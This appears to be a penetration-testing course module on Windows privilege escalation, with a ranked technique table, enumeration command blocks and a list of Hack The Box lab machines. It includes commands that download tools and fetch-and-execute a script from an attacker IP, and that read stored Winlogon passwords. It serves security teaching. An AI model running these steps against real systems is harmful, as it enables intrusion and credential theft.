Back to All Modules

Windows Privilege Escalation

#Overview

Windows privilege escalation elevates a low-privilege domain user or service account to local SYSTEM or Domain Administrator. Windows privesc surfaces are broader than Linux: service misconfigurations, token privileges, UAC bypass, Active Directory certificate services (ADCS), Kerberos delegation, and credential stores like LSASS and DPAPI. Always run automated enumeration first (WinPEAS, PowerUp, SharpHound), then drill into specific techniques.

#Priority Order

PriorityTechniqueKey Command/ToolEffortSuccess Rate
1Token privilegeswhoami /privMinimalHigh
2Service exploitationaccesschk, PowerUp.ps1LowHigh
3Scheduled tasksschtasks /query /fo LIST /vMediumMedium
4LSASS/credential dumpingprocdump + MimikatzMediumHigh
5AlwaysInstallElevatedreg query (2 keys)LowMedium
6UAC bypassfodhelper, computerdefaultsMediumMedium
7DLL hijackingProcMon + writable PATH dirsHighMedium
8Kernel exploitsWatson, WES-NGHighMedium
9ADCS (ESC1-ESC13)Certify, certipyMediumHigh
10Backup operatorsSeBackupPrivilege + robocopy /bMediumHigh
11RBCD / Kerberos delegationPowerMad + RubeusHighMedium
12WSL abusewsl.exe --rootLowHigh

#Automated Enumeration First

# WinPEAS.exe (comprehensive)
iwr http://10.10.14.5/winPEASx64.exe -outfile w.exe
.\w.exe

# PowerUp.ps1 (PowerShell service/task checks)
. .\PowerUp.ps1
Invoke-AllChecks

# SharpHound (AD enumeration for BloodHound)
.\SharpHound.exe -c All --zipfilename bloodhound.zip
# Upload bloodhound.zip to BloodHound for attack path analysis

# Seatbelt (.NET situational awareness)
.\Seatbelt.exe -group=all

# PrivescCheck.ps1
iex (iwr http://10.10.14.5/PrivescCheck.ps1 -usebasicparsing)
Invoke-PrivescCheck -Extended
POWERSHELL

#Manual Verification Priority

# 1. Privilege check
whoami /priv
whoami /groups

# 2. Service check
wmic service get name,pathname,startmode,startname | findstr /i "localsystem"
sc qc <service_name>

# 3. Registry escalation paths
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# 4. Scheduled tasks
schtasks /query /fo LIST /v | findstr /i "exe"

# 5. Unquoted service paths
wmic service get name,pathname | findstr /v "C:\\Windows" | findstr /i """"

# 6. Domain context
whoami /groups
echo %logonserver%
nltest /dclist:<domain>

# 7. Patches (for kernel exploit matching)
wmic qfe get HotFixID | findstr /i "KB"
systeminfo | findstr /i "hotfix"
POWERSHELL

#Cross-References

#Tool References

ToolLink
WinPEAShttps://github.com/carlospolop/PEASS-ng
PowerUp.ps1https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
SharpHoundhttps://github.com/BloodHoundAD/BloodHound
Seatbelthttps://github.com/GhostPack/Seatbelt
Certifyhttps://github.com/GhostPack/Certify

#Source Machines

  • Cereal (Hard, Windows) - SeImpersonatePrivilege + SweetPotato SSRF
  • Escape (Medium, Windows) - ADCS ESC1 certificate attack
  • Support (Easy, Windows) - RBCD attack via GenericAll on Domain Controller
  • StreamIO (Medium, Windows) - BloodHound WriteOwner ACL + LAPS password retrieval
  • Access (Easy, Windows) - runas /savecred + DPAPI credential extraction